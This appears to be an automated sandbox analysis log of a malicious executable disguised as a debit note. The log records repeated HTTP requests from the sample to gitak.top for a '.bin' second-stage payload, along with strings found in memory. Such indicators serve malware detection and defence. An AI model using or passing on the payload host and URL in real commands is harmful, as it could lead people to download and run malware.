    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: gitak.top
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000000.00000000.10626867806.0000000000409000.00000008.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000000.10746285611.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000001.10747980655.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15722470782.0000000035320000.00000004.00001000.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin#
    Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/KGukxUu155.bin)
